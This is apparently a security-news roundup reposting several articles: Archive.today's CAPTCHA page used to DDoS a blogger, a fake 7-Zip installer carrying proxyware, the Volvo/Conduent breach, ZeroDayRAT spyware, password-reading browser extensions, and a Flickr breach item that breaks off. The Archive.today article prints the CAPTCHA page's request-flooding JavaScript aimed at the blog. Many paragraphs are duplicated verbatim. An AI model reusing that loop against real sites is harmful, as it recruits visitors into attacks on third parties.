security meets culture
Archive.today CAPTCHA page Executes DDoS; Wikipedia considers Banning Site
By Jon Brodkin for Ars Technica
DDoS hit blog that tried to uncover Archive.today founder's identity in 2023.
DDoS hit blog that tried to uncover Archive.today founder's identity in 2023.
Credit: Getty Images | Riccardo Milani
Wikipedia editors are discussing whether to blacklist Archive.today because the archive site was used to direct a Distributed Denial of Service (DDoS) attack against a blogger who wrote a post in 2023 about the mysterious website's anonymous maintainer.
In a request for comment page, Wikipedia's volunteer editors were presented with 3 options. Option A is to remove or hide all Archive.today links and add the site to the spam blacklist. Option B is to deprecate Archive.today, discouraging future link additions while keeping the existing archived links. Option C is to do nothing and maintain the status quo.
Option A in particular would be a huge change, as more than 695,000 links to Archive.today are used across 400,000 or so Wikipedia pages. Archive.today, also known as Archive.is, is a website that saves snapshots of webpages and is commonly used to bypass news paywalls.
"Archive.today uses advanced scraping methods, and is generally considered more reliable than the Internet Archive," the Wikipedia request for comment said. "Due to concerns about botnets, linkspamming, and how the site is run, the community decided to blacklist it in 2013. In 2016, the decision was overturned, and archive.today was removed from the spam blacklist."
Discussion among editors has been ongoing since February 7. "Wikipedia's need for verifiable citations is absolutely not more important than the security of users," one editor in favor of blacklisting wrote. "We need verifiable citations so that we can maintain readers' trust, however, in order to be trustworthy our references also have to be safe to access."
Archive would be hard to replace
On the other side, an editor who supported Option C wrote that "Archive.today contains a vast amount of archives available nowhere else. Not on Wayback Machine, nowhere. It is the second largest archive provider across all Wikimedia sites. Removal/blockage of this site will be disruptive daily for thousands of editors and readers. It will result in a huge proliferation of {{dead link}} tags that will never be resolved."
Several posts mentioned an ongoing FBI case that could eventually make the Archive.today links useless anyway. Some said it would be better to act now than to have Option A forced on them later without a backup plan.
One editor supported starting with Option B and eventually shifting to Option A with "the proper end goal being the WMF-- Wikimedia Foundation-- supporting some sort of archive system, whether their own original or directly supporting the Internet Archive's work so it can be done more systematically."
Some discussion centered on copyright infringement, given that Archive.today publishes copies of many copyrighted articles. "On the general problem of linking to copyright infringement: perhaps the Wikimedia Foundation can work on ways to establish legally licensed archives of major paywalled sites, in partnership with archives such as the Internet Archive," one editor wrote. "It would be challenging given the business model of those sites, but maybe a workable compromise can be established that manages how many Wikipedia editors [have] access at a given time."
Malicious code in CAPTCHA page
The DDoS attack being discussed by Wikipedia editors was targeted at the Gyrovague blog written by Jani Patokallio. Last month, "the maintainers of Archive.today injected malicious code in order to perform a distributed denial of service attack against a person they were in dispute with," the Wikipedia request for comment says. "Every time a user encounters the CAPTCHA page, their Internet connection is used to attack a certain individual's blog."
The trustworthiness of Archive.today was discussed in light of evidence that the site's founder threatened to create "a new category of AI porn" in retaliation against the blogger. The AI porn threat was mentioned by several editors.
I echo others [that Option] "A is looking like something we'll have to do eventually, anyways, and at least this way we have a chance to do it on our terms," one editor wrote. "I hate to break it to you, but even if the FBI thing goes nowhere, a website whose operator apparently threatens to create AI porn in retaliation against enemies, using their names, isn't a trustworthy mirror, and isn't going to remain one."
One editor reported being "miserable" about supporting Option A, "but we cannot permit websites to rope our readers into being part of DDoS attacks." Moreover, "The fact is that most of the archive.today links on Wikipedia are not an attempt to save URLs that have now gone dead that the Internet Archive cannot handle, but efforts to bypass paywalls, which is convenient, but illegal. It's strange that we accept links to archive.today for this purpose but don't accept the same for Anna's Archive or Sci-Hub," the editor wrote.
We emailed the Archive.today's webmaster address today about the Wikipedia discussion and will update this article if we get a response.
Blogger tried to uncover founder's identity
The Wikipedia request for comments acknowledged that whether to blacklist would be a difficult decision. There are "significant concerns for readers' safety, as well as the long-term stability and integrity of the service," but "a significant amount of people also think that mass-removing links to Archive.today may harm verifiability, and that the service is harder to censor than certain other archiving sites," it said.
An update to the request for comments yesterday indicated that the attack temporarily stopped, but the malicious code had been reactivated. "Please do not visit the archive without blocking network requests to gyrovague.com to avoid being part of the attack!" it said.
The code's first public mention was apparently in a Hacker News thread on January 14, and Patokallio wrote about the DDoS in a February 1 blog post. "Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources," he wrote. The Javascript code in the Archive.today CAPTCHA page is as follows:
setInterval(function() {
fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
referrerPolicy: "no-referrer",
mode: "no-cors"
In August 2023, Patokallio wrote a post attempting to uncover the identity of Archive.today founder "Denis Petrov," which seems to be an alias. Patokallio wasn't able to figure out who the founder is but cobbled together various tidbits from Internet searches, including a Stack Exchange post that mentioned another potential alias, "Masha Rabinovich."
Patokallio seemed to be driven by curiosity and was impressed by Archive.today's work. "It's a testament to their persistence that they're managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee," Patokallio's 2023 post said.
The Gyrovague blog's sidebar states that Patokallio works for Google's Cloud team in Sydney, Australia. In his post this month, Patokallio said his 2023 blog "gathered some 10,000 views and a bit [of] discussion on Hacker News, but didn't exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next 2 years and a bit."
FBI case revives interest in 2023 blog
But in October 2025, the FBI sent a subpoena< to domain registrar Tucows seeking "subscriber information on [the] customer behind archive.today" in connection with "a federal criminal investigation being conducted by the FBI." We wrote about the subpoena, and our story included a link to Patokallio's 2023 blog post in a sentence that said, "There are several indications that the [Archive.today] founder is from Russia."
In an email to Ars, Patokallio told us that the DDoS attack "appears to be because you kindly mentioned my blog in your Nov 8, 2025 story." Patokallio added that he is "as mystified by this as you probably are." Articles about the subpoena by The Verge and Heise Online also linked to Patokallio's 2023 blog post.
On January 8, 2026, Patokallio's hosting company, Automattic, notified him that it received a GDPR-- General Data Protection Regulation-- complaint from a "Nora Puchreiner" alleging that the 2023 post "contains extensive personal data… presented in a narrative that is defamatory in tone and context." Patokallio said that after he submitted a rebuttal, "Automattic sided with me and left the post up."
Patokallio said he also "received a politely worded email from archive.today's webmaster asking me to take down the post for a few months" on January 10. The email was classified as spam by Gmail, and he didn't see it until 5 days later, he said. In the meantime, the DDoS started.
Patokallio said he replied to the webmaster's email on January 15 and again on January 20 but didn't hear back. He tried a third time on January 25, saying he would not take down the blog post but offered to "change some wording that you feel is being misrepresented."
Emails threatened AI porn and other scams
Patokallio posted what he called a lightly redacted copy of the resulting email thread. The first email from the Archive.today webmaster said, "I do not mind the post, but the issue is: journos from mainstream media-- Heise, Verge, etc-- cherry-pick just a couple of words from your blog, and then construct very different narratives having your post the only citable source; then they cite each other and produce a shitty result to present for a wide audience."
In a later email, "Nora Puchreiner" wrote, "I do not care on your blog and its content. I just need the links from Heise and other media to be 404." One message threatened to investigate "your Nazi grandfather" and "vibecode a gyrovague.gay dating app." Another threatened to create a public association between Patokallio's name and AI porn.
A Tumblr blog post apparently written by the Archive.today founder seems to generally confirm the emails' veracity, but says the original version threatened to create "a patokallio.gay dating app," not "a gyrovague.gay dating app." The Tumblr blog has several other recent posts criticizing Patokallio and accusing him of hiding his real name. However, the Gyrovague blog shows Patokallio's name in a sidebar and discloses that he works for Google, while stating that the blog posts contain only his personal views.
In one email, Patokallio included a link to Wikipedia's page on the Streisand effect, a name for situations in which people seeking to suppress access to information instead draw more public attention to the information they want hidden. The Archive.today site maintainer apparently viewed this as a threat.
"And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?" the email said. Patokallio responded, "No, you're Streisanding yourself: the DDOS has already drawn more attention to my blog post than it had gotten in the last 2 years, with zero action on my side."
A subsequent reply in the email thread contained the "Nazi grandfather" and "gay dating app" threats. Patokallio wrote that after these emails, it didn't seem worthwhile to continue the discussion. "At this point it was pretty clear the conversation had run its course, so here we are," Patokallio wrote in his February 1 blog post. "And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a 'Nazi' in Russia these days."
While the outcome at Wikipedia is not yet settled, Patokallio wrote that the DDoS attack didn't cause him any real harm. The Archive.today maintainer apparently intended to make Patokallio's hosting costs more expensive, but "I have a flat fee plan, meaning this has cost me exactly zero dollars," he wrote.
In a request for comment page, Wikipedia's volunteer editors were presented with 3 options. Option A is to remove or hide all Archive.today links and add the site to the spam blacklist. Option B is to deprecate Archive.today, discouraging future link additions while keeping the existing archived links. Option C is to do nothing and maintain the status quo.
Option A in particular would be a huge change, as more than 695,000 links to Archive.today are used across 400,000 or so Wikipedia pages. Archive.today, also known as Archive.is, is a website that saves snapshots of webpages and is commonly used to bypass news paywalls.
"Archive.today uses advanced scraping methods, and is generally considered more reliable than the Internet Archive," the Wikipedia request for comment said. "Due to concerns about botnets, linkspamming, and how the site is run, the community decided to blacklist it in 2013. In 2016, the decision was overturned, and archive.today was removed from the spam blacklist."
Discussion among editors has been ongoing since February 7. "Wikipedia's need for verifiable citations is absolutely not more important than the security of users," one editor in favor of blacklisting wrote. "We need verifiable citations so that we can maintain readers' trust, however, in order to be trustworthy our references also have to be safe to access."
Archive would be hard to replace
On the other side, an editor who supported Option C wrote that "Archive.today contains a vast amount of archives available nowhere else. Not on Wayback Machine, nowhere. It is the second largest archive provider across all Wikimedia sites. Removal/blockage of this site will be disruptive daily for thousands of editors and readers. It will result in a huge proliferation of {{dead link}} tags that will never be resolved."
Several posts mentioned an ongoing FBI case that could eventually make the Archive.today links useless anyway. Some said it would be better to act now than to have Option A forced on them later without a backup plan.
One editor supported starting with Option B and eventually shifting to Option A with "the proper end goal being the WMF-- Wikimedia Foundation-- supporting some sort of archive system, whether their own original or directly supporting the Internet Archive's work so it can be done more systematically."
Some discussion centered on copyright infringement, given that Archive.today publishes copies of many copyrighted articles. "On the general problem of linking to copyright infringement: perhaps the Wikimedia Foundation can work on ways to establish legally licensed archives of major paywalled sites, in partnership with archives such as the Internet Archive," one editor wrote. "It would be challenging given the business model of those sites, but maybe a workable compromise can be established that manages how many Wikipedia editors [have] access at a given time."
Malicious code in CAPTCHA page
The DDoS attack being discussed by Wikipedia editors was targeted at the Gyrovague blog written by Jani Patokallio. Last month, "the maintainers of Archive.today injected malicious code in order to perform a distributed denial of service attack against a person they were in dispute with," the Wikipedia request for comment says. "Every time a user encounters the CAPTCHA page, their Internet connection is used to attack a certain individual's blog."
The trustworthiness of Archive.today was discussed in light of evidence that the site's founder threatened to create "a new category of AI porn" in retaliation against the blogger. The AI porn threat was mentioned by several editors.
I echo others [that Option] "A is looking like something we'll have to do eventually, anyways, and at least this way we have a chance to do it on our terms," one editor wrote. "I hate to break it to you, but even if the FBI thing goes nowhere, a website whose operator apparently threatens to create AI porn in retaliation against enemies, using their names, isn't a trustworthy mirror, and isn't going to remain one."
One editor reported being "miserable" about supporting Option A, "but we cannot permit websites to rope our readers into being part of DDoS attacks." Moreover, "The fact is that most of the archive.today links on Wikipedia are not an attempt to save URLs that have now gone dead that the Internet Archive cannot handle, but efforts to bypass paywalls, which is convenient, but illegal. It's strange that we accept links to archive.today for this purpose but don't accept the same for Anna's Archive or Sci-Hub," the editor wrote.
We emailed the Archive.today's webmaster address today about the Wikipedia discussion and will update this article if we get a response.
Blogger tried to uncover founder's identity
The Wikipedia request for comments acknowledged that whether to blacklist would be a difficult decision. There are "significant concerns for readers' safety, as well as the long-term stability and integrity of the service," but "a significant amount of people also think that mass-removing links to Archive.today may harm verifiability, and that the service is harder to censor than certain other archiving sites," it said.
An update to the request for comments yesterday indicated that the attack temporarily stopped, but the malicious code had been reactivated. "Please do not visit the archive without blocking network requests to gyrovague.com to avoid being part of the attack!" it said.
The code's first public mention was apparently in a Hacker News thread on January 14, and Patokallio wrote about the DDoS in a February 1 blog post. "Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources," he wrote. The Javascript code in the Archive.today CAPTCHA page is as follows:
setInterval(function() {
fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
referrerPolicy: "no-referrer",
mode: "no-cors"
In August 2023, Patokallio wrote a post attempting to uncover the identity of Archive.today founder "Denis Petrov," which seems to be an alias. Patokallio wasn't able to figure out who the founder is but cobbled together various tidbits from Internet searches, including a Stack Exchange post that mentioned another potential alias, "Masha Rabinovich."
Patokallio seemed to be driven by curiosity and was impressed by Archive.today's work. "It's a testament to their persistence that they're managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee," Patokallio's 2023 post said.
The Gyrovague blog's sidebar states that Patokallio works for Google's Cloud team in Sydney, Australia. In his post this month, Patokallio said his 2023 blog "gathered some 10,000 views and a bit [of] discussion on Hacker News, but didn't exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next 2 years and a bit."
FBI case revives interest in 2023 blog
But in October 2025, the FBI sent a subpoena< to domain registrar Tucows seeking "subscriber information on [the] customer behind archive.today" in connection with "a federal criminal investigation being conducted by the FBI." We wrote about the subpoena, and our story included a link to Patokallio's 2023 blog post in a sentence that said, "There are several indications that the [Archive.today] founder is from Russia."
In an email to Ars, Patokallio told us that the DDoS attack "appears to be because you kindly mentioned my blog in your Nov 8, 2025 story." Patokallio added that he is "as mystified by this as you probably are." Articles about the subpoena by The Verge and Heise Online also linked to Patokallio's 2023 blog post.
On January 8, 2026, Patokallio's hosting company, Automattic, notified him that it received a GDPR-- General Data Protection Regulation-- complaint from a "Nora Puchreiner" alleging that the 2023 post "contains extensive personal data… presented in a narrative that is defamatory in tone and context." Patokallio said that after he submitted a rebuttal, "Automattic sided with me and left the post up."
Patokallio said he also "received a politely worded email from archive.today's webmaster asking me to take down the post for a few months" on January 10. The email was classified as spam by Gmail, and he didn't see it until 5 days later, he said. In the meantime, the DDoS started.
Patokallio said he replied to the webmaster's email on January 15 and again on January 20 but didn't hear back. He tried a third time on January 25, saying he would not take down the blog post but offered to "change some wording that you feel is being misrepresented."
Emails threatened AI porn and other scams
Patokallio posted what he called a lightly redacted copy of the resulting email thread. The first email from the Archive.today webmaster said, "I do not mind the post, but the issue is: journos from mainstream media-- Heise, Verge, etc-- cherry-pick just a couple of words from your blog, and then construct very different narratives having your post the only citable source; then they cite each other and produce a shitty result to present for a wide audience."
In a later email, "Nora Puchreiner" wrote, "I do not care on your blog and its content. I just need the links from Heise and other media to be 404." One message threatened to investigate "your Nazi grandfather" and "vibecode a gyrovague.gay dating app." Another threatened to create a public association between Patokallio's name and AI porn.
A Tumblr blog post apparently written by the Archive.today founder seems to generally confirm the emails' veracity, but says the original version threatened to create "a patokallio.gay dating app," not "a gyrovague.gay dating app." The Tumblr blog has several other recent posts criticizing Patokallio and accusing him of hiding his real name. However, the Gyrovague blog shows Patokallio's name in a sidebar and discloses that he works for Google, while stating that the blog posts contain only his personal views.
In one email, Patokallio included a link to Wikipedia's page on the Streisand effect, a name for situations in which people seeking to suppress access to information instead draw more public attention to the information they want hidden. The Archive.today site maintainer apparently viewed this as a threat.
"And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?" the email said. Patokallio responded, "No, you're Streisanding yourself: the DDOS has already drawn more attention to my blog post than it had gotten in the last 2 years, with zero action on my side."
A subsequent reply in the email thread contained the "Nazi grandfather" and "gay dating app" threats. Patokallio wrote that after these emails, it didn't seem worthwhile to continue the discussion. "At this point it was pretty clear the conversation had run its course, so here we are," Patokallio wrote in his February 1 blog post. "And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a 'Nazi' in Russia these days."
While the outcome at Wikipedia is not yet settled, Patokallio wrote that the DDoS attack didn't cause him any real harm. The Archive.today maintainer apparently intended to make Patokallio's hosting costs more expensive, but "I have a flat fee plan, meaning this has cost me exactly zero dollars," he wrote.
Malicious 7-Zip Site distributes Installer laced with Proxy Tool
By Bill Toulas for bleepingcomputer
bleepingcomputer
A fake 7-Zip website is distributing a trojanized installer of the popular archiving tool that turns the user's computer into a residential proxy node.
Residential proxy networks use home user devices to route traffic with the goal of evading blocks and performing various malicious activities such as credential stuffing, phishing, and malware distribution.
The new campaign became better known after a user reported that they downloaded a malicious installer from a website impersonating the 7-Zip project while following instructions in a YouTube tutorial on building a PC system. BleepingComputer can confirm that the malicious website, 7zip[.]com, is still live.
The threat actor registered the domain 7zip[.]com-- still live at the time of writing-- that can easily trick users into thinking they landed on the site of the legitimate tool.
Furthermore, the attacker copied the text and mimicked the structure of the original 7-Zip website located at 7-zip.org.
Residential proxy networks use home user devices to route traffic with the goal of evading blocks and performing various malicious activities such as credential stuffing, phishing, and malware distribution.
The new campaign became better known after a user reported that they downloaded a malicious installer from a website impersonating the 7-Zip project while following instructions in a YouTube tutorial on building a PC system. BleepingComputer can confirm that the malicious website, 7zip[.]com, is still live.
The threat actor registered the domain 7zip[.]com-- still live at the time of writing-- that can easily trick users into thinking they landed on the site of the legitimate tool.
Furthermore, the attacker copied the text and mimicked the structure of the original 7-Zip website located at 7-zip.org.
Malicious website dropping the trojanized 7-Zip. Source: BleepingComputer
The installer file was analyzed by researchers at cybersecurity company Malwarebytes, who found that it is digitally signed with a now-revoked certificate originally issued to Jozeal Network Technology Co., Limited.
The malicious copy also contains the 7-Zip program, thus providing the regular functions of the tool. However, the installer drops 3 malicious files:
- Uphero.exe – service manager and update loader
- hero.exe – main proxy payload
- hero.dll – support library
These files are placed in the 'C:\Windows\SysWOW64\hero\' directory, and an auto-start Windows service running as SYSTEM is created for the 2 malicious executables.
Additionally, firewall rules are modified using 'netsh' to allow the binaries to establish inbound and outbound connections.
Eventually, the host system is profiled with Microsoft's Windows Management Instrumentation (WMI) and Windows APIs to determine the hardware, memory, CPU, disk, and network characteristics. The collected data is then sent to 'iplogger[.]org.'
"While initial indicators suggested backdoor‑style capabilities, further analysis revealed that the malware's primary function is proxyware," Malwarebytes explains about the malware's operational goal.
"The infected host is enrolled as a residential proxy node, allowing 3rd-parties to route traffic through the victim's IP address."
According to the analysis, hero.exe pulls config from rotating “smshero”-themed C2 domains, then opens outbound proxy connections on non-standard ports such as 1000 and 1002. Control messages are obfuscated using a lightweight XOR key.
Malwarebytes found that the campaign is larger than the 7-Zip lure and also uses trojanized installers for HolaVPN, TikTok, WhatsApp, and Wire VPN.
The malware uses a rotating C2 infrastructure built around hero/smshero domains, with traffic going through the Cloudflare infrastructure and carried over TLS-encrypted HTTPs.
It also relies on DNS-over-HTTPS via Google's resolver, which reduces visibility for defenders monitoring standard DNS traffic.
The malware also checks for virtualization platforms such as VMware, VirtualBox, QEMU, Parallels, as well as for debuggers, to identify when it's being analyzed.
Malwarebytes' investigation started after noticing research from independent security researchers who analyzed the malware and uncovered its true purpose. Researcher Luke Acha discovered the purpose of the Uphero/hero malware.
The xor-based communication protocol was reverse-engineered and decoded by s1dhy, who confirmed the proxy behavior. Digital forensics and incident response (DFIR) engineer Andrew Danis connected the fake 7-Zip installer to the larger campaign impersonating multiple software brands.
Malwarebytes lists indicators of compromise-- domains, file paths, IP addresses-- and host-related data observed during their analysis.
Users are recommended to avoid following URLs from YouTube videos or promoted search results, and instead bookmark the download portal domains for the software they use often.
Volvo Group North America Customer Data Exposed in Conduent Hack
By Bill Toulas for bleepingcomputer
bleepingcomputer
Volvo Group North America disclosed that it suffered an indirect data breach stemming from the compromise of IT systems at American business services giant Conduent, of which Volvo is a customer.
Volvo Group North America is the Swedish multinational's operating arm in the United States, Canada, and Mexico. It focuses on manufacturing commercial vehicles and heavy equipment, including trucks, buses, construction equipment, engines, and industrial power systems.
Mack Trucks, a very popular brand in the US, is one of its subsidiaries. Volvo Group is not the same as Volvo Cars, and does not manufacture passenger cars.
Nearly 17,000 customers of Volvo Group North America, along and/or company staff had their personal details exposed in a massive data breach that Conduent disclosed in late 2025.
Conduent is an American business process outsourcing (BPO) company that provides digital platforms and services for governments and enterprises.
The company suffered a security breach between October 21, 2024, and January 13, 2025, where threat actors stole full names, Social Security Numbers (SSNs), dates of birth, health insurance policy details, ID numbers, and medical information.
Conduent has not yet determined the exact number of impacted individuals, but has previously disclosed that it affects 10.5 million people in Oregon and another 15.5 million in Texas.
The company is now sending notifications on behalf of its customers to impacted parties, offering Volvo Group North America clients and staff free membership to identity monitoring services for at least a year, along with credit and dark web monitoring, and identity restoration.
Additionally, notification recipients are advised to consider placing fraud alerts or a security freeze on their credit reports.
Volvo Group North America has recently suffered a new data breach, also caused by a 3rd-party supplier, exposing staff data such as full names and Social Security Numbers.
That breach was caused by a compromise at IT services supplier Miljödata in August 2025, which exposed the information of 1.5 million people, including Volvo Group employees in Sweden and in the US.
In 2021, Volvo Cars suffered a security breach where hackers stole research and development (R&D) data from its servers. That attack was claimed by the 'Snatch' data extortion group, which leaked the stolen files on their extortion portal.
Volvo Group North America is the Swedish multinational's operating arm in the United States, Canada, and Mexico. It focuses on manufacturing commercial vehicles and heavy equipment, including trucks, buses, construction equipment, engines, and industrial power systems.
Mack Trucks, a very popular brand in the US, is one of its subsidiaries. Volvo Group is not the same as Volvo Cars, and does not manufacture passenger cars.
Nearly 17,000 customers of Volvo Group North America, along and/or company staff had their personal details exposed in a massive data breach that Conduent disclosed in late 2025.
Conduent is an American business process outsourcing (BPO) company that provides digital platforms and services for governments and enterprises.
The company suffered a security breach between October 21, 2024, and January 13, 2025, where threat actors stole full names, Social Security Numbers (SSNs), dates of birth, health insurance policy details, ID numbers, and medical information.
Conduent has not yet determined the exact number of impacted individuals, but has previously disclosed that it affects 10.5 million people in Oregon and another 15.5 million in Texas.
The company is now sending notifications on behalf of its customers to impacted parties, offering Volvo Group North America clients and staff free membership to identity monitoring services for at least a year, along with credit and dark web monitoring, and identity restoration.
Additionally, notification recipients are advised to consider placing fraud alerts or a security freeze on their credit reports.
Volvo Group North America has recently suffered a new data breach, also caused by a 3rd-party supplier, exposing staff data such as full names and Social Security Numbers.
That breach was caused by a compromise at IT services supplier Miljödata in August 2025, which exposed the information of 1.5 million people, including Volvo Group employees in Sweden and in the US.
In 2021, Volvo Cars suffered a security breach where hackers stole research and development (R&D) data from its servers. That attack was claimed by the 'Snatch' data extortion group, which leaked the stolen files on their extortion portal.
ZeroDayRAT Malware grants Full Access to Android, iOS Devices
By Bill Toulas for bleepingcomputer
bleepingcomputer
A new commercial mobile spyware platform dubbed ZeroDayRAT is being advertised to cybercriminals on Telegram as a tool that provides full remote control over compromised Android and iOS devices.
The malware provides buyers with a full-featured panel for managing infected devices, reportedly supporting Android 5 through 16 and iOS up to version 26 latest.
Researchers at mobile threat hunting company iVerify say that ZeroDayRAT not just steals data but also enables real-time surveillance and financial theft.
The dashboard shows compromised devices and information about the model, operating system version, battery status, SIM details, country, and lock state.
The malware provides buyers with a full-featured panel for managing infected devices, reportedly supporting Android 5 through 16 and iOS up to version 26 latest.
Researchers at mobile threat hunting company iVerify say that ZeroDayRAT not just steals data but also enables real-time surveillance and financial theft.
The dashboard shows compromised devices and information about the model, operating system version, battery status, SIM details, country, and lock state.
Dashboard overview. Source: iVerify
The malware can log app usage, activity timelines, SMS message exchanges, and provides an overview to the operator.
Other tracking tabs on the dashboard display all received notifications, and also registered accounts on the infected device, showing email/user ID, potentially enabling brute-forcing and credential stuffing.
If GPS access is secured, the malware can also track the victim in real time and draw their current position on a Google Maps view, with full location history.
Tracking the victim in real time. Source: iVerify
Apart from passive data logging, ZeroDayRAT also supports active hands-on operations, such as activating the device's cameras-- front and rear-- and microphone to gain access to a live media feed, or recording the victim's screen to expose other secrets.
Accessing camera and microphone feeds. Source: iVerify
Moreover, if the SMS access permission is secured, the malware can capture incoming one-time passwords (OTPs), enabling 2FA bypass, and also send SMS from the victim’s device.
The malware developer also included a keylogging module that can capture user input, like passwords, gestures, or screen unlock patterns.
Further financial theft is enabled through a cryptocurrency stealer module. The researchers found that the component activates a wallet app scanner looking for MetaMask, Trust Wallet, Binance, and Coinbase, logs wallet IDs and balances, and attempts clipboard address injection, replacing copied wallet addresses with attacker-controlled ones.
The bank stealer targets online banking apps, UPI platforms like Google Pay and PhonePe, and payment services such as Apple Pay and PayPal. Credential theft occurs by overlaying fake screens.
The crypto and bank stealer modules. Source: iVerify
iVerify does not detail how the malware is delivered but say that ZeroDayRAT "is a complete mobile compromise toolkit." The researchers warn that a compromised employee device could lead to enterprise breaches.
For an individual, a ZeroDayRAT compromise could expose their privacy and lead to financial losses.
Users are recommended to only trust the official app stores, Google Play on Android and Apple Store on iOS, and install apps from reputable publishers. High-risk users should consider enabling Lockdown Mode on iOS and Advanced Protection on Android.
Your Browser Extensions can See Every Password You Type
By Tashreef Shareef for Make Use Of
Credit: Tashreef Shareef / MakeUseOf
Browser extensions enhance the functionality of the browser, and most of us have at least one 3rd-party add-on installed. I always keep a handful of Chrome extensions installed for productivity, and some of them are ones I genuinely can't browse without. Ad blockers, full-page screenshot tools, price comparison trackers, they all seem harmless enough.
However, some of these extensions, including ones with thousands of 5-star reviews, can see your passwords as you type them into websites. A vulnerability in how browsers share page data with extensions gives them unrestricted access to everything on a web page, and some have been caught leaking sensitive user information because of it.
A DOM vulnerability that exposes your password - How extensions read what you type in plain text
However, some of these extensions, including ones with thousands of 5-star reviews, can see your passwords as you type them into websites. A vulnerability in how browsers share page data with extensions gives them unrestricted access to everything on a web page, and some have been caught leaking sensitive user information because of it.
A DOM vulnerability that exposes your password - How extensions read what you type in plain text
Credit: Tashreef Shareef / MakeUseOf
Researchers at the University of Wisconsin-Madison found that browser extensions can access passwords typed into websites, even when they comply with Chrome's latest Manifest V3 security standards. The team analyzed over 7,000 websites and discovered that about 15% of them stored sensitive information like passwords, credit card numbers, and Social Security numbers directly in the page's HTML code as plain text.
This happens because of how browsers handle the DOM-- Document Object Model-- which is the structure that represents everything on a web page. When you type a password, your browser stores that value in a DOM element that any extension with the right permissions can read. Extensions can exploit this in three main ways: keylogging to capture each keystroke as it happens, accessing the HTML source code directly to grab stored values, and abusing DOM APIs to extract values from input fields as you type. It's the last method that is especially concerning because it bypasses any visual obfuscation like dots or asterisks that only hide the password from your screen, not from the code running behind it.
The irony is that browsers are configured this way on purpose. Legitimate password managers need to read and fill in these fields to work properly. But that same access creates an opening for malicious extensions. Even Chrome's latest Manifest V3 standard, which was designed to improve extension security, doesn't create a security boundary between extensions and web page content. The researchers built a proof-of-concept extension disguised as an AI assistant, submitted it to the Chrome Web Store, and got it approved, proving how easily a harmful extension can slip through.
The permission trap - Trusted extensions that turned malicious overnight
Credit: Tashreef Shareef / MakeUseOf
Most of us install extensions that have been vetted by official browser stores, which makes them easy to trust. We click through permission prompts without a second thought, including the one that says Read and change all your data on websites you visit. That single permission is all an extension needs to access everything you type, including passwords.
What makes this worse is that some extensions operate with a clean reputation for years before turning hostile. The ShadyPanda campaign, which has been running since 2018, compromised roughly 4.3 million Chrome and Edge users by pushing malicious updates to previously legitimate extensions. Some of these add-ons ran cleanly for seven years before receiving their first malicious payload. WeTab, a new tab extension for Microsoft Edge with over three million installs and thousands of positive reviews, was found to be injecting malicious links and sending browsing data to servers in China while users had no idea anything had changed.
The MEGA.nz Chrome extension was compromised in 2018, leaking usernames, passwords, and cryptocurrency keys from an estimated 1.6 million users over four hours before anyone noticed. In 2024, CyberHaven's browser extension was hijacked through an OAuth phishing attack and used to exfiltrate cookies, session tokens, and Facebook Ads account data from over 400,000 users. The Trust Wallet browser extension suffered a similar breach that led to roughly $7 million in cryptocurrency theft.
As you may have noticed by now, these aren't obscure extensions from unknown developers. They were popular, well-reviewed, and trusted by millions, until they weren't.
What you can do to protect yourself - Reducing your attack surface across every browser
If you think switching from Chrome to Firefox fixes this, it doesn't. The DarkSpectre sleeper extension campaign recently hit Firefox with its GhostPoster operation, where attackers hid malicious JavaScript inside PNG image files using steganography. The affected extensions had over 840,000 downloads across browsers, and some had been active for up to 5 years before researchers exposed them.
Mozilla has since removed the affected add-ons and disabled them in users' browsers, but Chrome and Edge users with the same compromised extensions still need to manually uninstall them. This proves that this isn't a Chrome-only problem, but a browser extension ecosystem problem, so switching to a different browser is not a solution.
The best way to protect yourself is to keep your extension count as low as possible. Do a routine check on your installed extensions and remove anything you haven't used in a while. I cleared out my old Chrome extensions recently and realized I was carrying add-ons I hadn't touched in months. Before installing anything new, check the developer's credentials, read through recent reviews for anything suspicious, and question any extension asking for broad permissions it doesn't obviously need.
Make Use Of
Your browser probably already has built-in features that replace common extensions. Chrome, for instance, now has a native password manager, page translation, reading list, and screenshot tools that make several popular extensions unnecessary. Fewer extensions mean fewer potential entry points for attackers.
For your accounts, replace passwords with passkeys wherever you can and enable 2-factor authentication on everything that supports it. Passkeys can't be intercepted by DOM access since there's nothing to type. Keep your browser updated, and watch for suspicious behavior like tabs auto-opening to gambling, adult, or affiliate pages-- that's often a sign an extension has gone rogue. The Wisconsin researchers also recommend that websites change how they handle sensitive input fields so passwords aren't exposed in HTML, but that's on developers to fix, not something you can control.
We should pay a little attention to what we install
The most dangerous extensions aren't the ones built to be malicious from day one, but the ones that are popular and well-maintained that get bought by a threat actor or compromised through a supply chain attack without users ever knowing. One day, they're blocking ads or managing tabs, the next, they're quietly harvesting your credentials through an update you never noticed.
There's no single fix for this. Browser stores are doing their best with automated reviews and manual checks, but sleeper campaigns have shown they can stay undetected for years. The best you can do is keep your extension list short, stay skeptical about permissions, and use passkeys and 2-factor authentication as a safety net for when something inevitably slips through.
Flickr discloses Potential Data Breach exposing Users' Names, Emails
By Sergiu Gatlan for bleepingcomputer
bleepingcomputer
Photo-sharing platform Flickr is notifying users of a potential data breach after a vulnerability at a 3rd-party email service provider exposed their real names, email addresses, IP addresses, and account activity.
Founded in 2004, Flickr is one of the world's largest photography communities and sharing sites, hosting over 28 billion photos and videos. The company says it has 35 million monthly users and 800 million monthly page views.
